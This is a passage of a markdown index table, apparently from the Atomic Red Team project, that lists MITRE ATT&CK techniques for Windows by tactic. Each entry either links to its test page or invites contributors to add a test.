| [External Remote Services](../../T1133/T1133.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | [File and Directory Discovery](../../T1083/T1083.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Authentication Package](../../T1547.002/T1547.002.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Group Policy Discovery](../../T1615/T1615.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Local Accounts](../../T1078.003/T1078.003.md) | [Malicious File](../../T1204.002/T1204.002.md) | [BITS Jobs](../../T1197/T1197.md) | [Authentication Package](../../T1547.002/T1547.002.md) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [Local Account](../../T1087.001/T1087.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Exfiltration Over Web Service](../../T1567/T1567.md) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Replication Through Removable Media](../../T1091/T1091.md) | [Native API](../../T1106/T1106.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [DCSync](../../T1003.006/T1003.006.md) | [Local Groups](../../T1069.001/T1069.001.md) | [Replication Through Removable Media](../../T1091/T1091.md) | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [PowerShell](../../T1059.001/T1059.001.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Scanning](../../T1046/T1046.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Share Discovery](../../T1135/T1135.md) | Shared Webroot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | [Forced Authentication](../../T1187/T1187.md) | [Network Sniffing](../../T1040/T1040.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Data from Network Shared Drive](../../T1039/T1039.md) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Password Policy Discovery](../../T1201/T1201.md) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Internal Defacement](../../T1491.001/T1491.001.md) |
| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Process with Token](../../T1134.002/T1134.002.md) | [Control Panel](../../T1218.002/T1218.002.md) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Service Execution](../../T1569.002/T1569.002.md) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Process with Token](../../T1134.002/T1134.002.md) | [Golden Ticket](../../T1558.001/T1558.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Shared Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Process Discovery](../../T1057/T1057.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | [Software Deployment Tools](../../T1072/T1072.md) | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Query Registry](../../T1012/T1012.md) | | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Internal Proxy](../../T1090.001/T1090.001.md) | Resource Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Default Accounts](../../T1078.001/T1078.001.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Remote System Discovery](../../T1018/T1018.md) | | [Keylogging](../../T1056.001/T1056.001.md) | | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | [LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | [Visual Basic](../../T1059.005/T1059.005.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Direct Volume Access](../../T1006/T1006.md) | [LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | [Software Discovery](../../T1518/T1518.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Service Stop](../../T1489/T1489.md) |
| | [Windows Command Shell](../../T1059.003/T1059.003.md) | [Default Accounts](../../T1078.001/T1078.001.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [LSA Secrets](../../T1003.004/T1003.004.md) | [System Checks](../../T1497.001/T1497.001.md) | | [Local Email Collection](../../T1114.001/T1114.001.md) | | [Multi-hop Proxy](../../T1090.003/T1090.003.md) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | [Windows Management Instrumentation](../../T1047/T1047.md) | [Domain Account](../../T1136.002/T1136.002.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [System Information Discovery](../../T1082/T1082.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
| | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Language Discovery](../../T1614.001/T1614.001.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [NTDS](../../T1003.003/T1003.003.md) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Screen Capture](../../T1113/T1113.md) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Non-Standard Port](../../T1571/T1571.md) | |
| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | [Video Capture](../../T1125/T1125.md) | | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Password Cracking](../../T1110.002/T1110.002.md) | [System Owner/User Discovery](../../T1033/T1033.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [External Remote Services](../../T1133/T1133.md) | Group Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Password Filter DLL](../../T1556.002/T1556.002.md) | [System Service Discovery](../../T1007/T1007.md) | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | [System Time Discovery](../../T1124/T1124.md) | | | | [Protocol Tunneling](../../T1572/T1572.md) | |
| | | Hypervisor [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | IIS Components [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | [Remote Access Software](../../T1219/T1219.md) | |
| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Local Accounts](../../T1078.003/T1078.003.md) | Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Private Keys](../../T1552.004/T1552.004.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | [Standard Encoding](../../T1132.001/T1132.001.md) | |
| | | LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SAML Tokens [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Local Account](../../T1136.001/T1136.001.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Local Accounts](../../T1078.003/T1078.003.md) | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Silver Ticket](../../T1558.002/T1558.002.md) | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal Web Session Cookie](../../T1539/T1539.md) | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
| | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | [File Deletion](../../T1070.004/T1070.004.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | Path Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | [Office Application Startup](../../T1137/T1137.md) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | Hidden File System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | [Office Test](../../T1137.002/T1137.002.md) | [Port Monitors](../../T1547.010/T1547.010.md) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | [Windows Credential Manager](../../T1555.004/T1555.004.md) | | | | | | |
| | | Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Outlook Home Page](../../T1137.004/T1137.004.md) | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Hidden Window](../../T1564.003/T1564.003.md) | | | | | | | |
| | | Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hide Artifacts](../../T1564/T1564.md) | | | | | | | |
| | | [Password Filter DLL](../../T1556.002/T1556.002.md) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Path Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Hollowing](../../T1055.012/T1055.012.md) | Impair Command History Logging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection](../../T1055/T1055.md) | Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | | |
| | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [SID-History Injection](../../T1134.005/T1134.005.md) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | |
| | | [Port Monitors](../../T1547.010/T1547.010.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indirect Command Execution](../../T1202/T1202.md) | | | | | | | |
| | | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Screensaver](../../T1546.002/T1546.002.md) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | |
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | [InstallUtil](../../T1218.004/T1218.004.md) | | | | | | | |
| | | Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Local Accounts](../../T1078.003/T1078.003.md) | | | | | | | |
| | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Shortcut Modification](../../T1547.009/T1547.009.md) | MMC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Thread Execution Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | |
| | | [Scheduled Task](../../T1053.005/T1053.005.md) | Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) | | | | | | | |
| | | [Screensaver](../../T1546.002/T1546.002.md) | [Token Impersonation/Theft](../../T1134.001/T1134.001.md) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | |
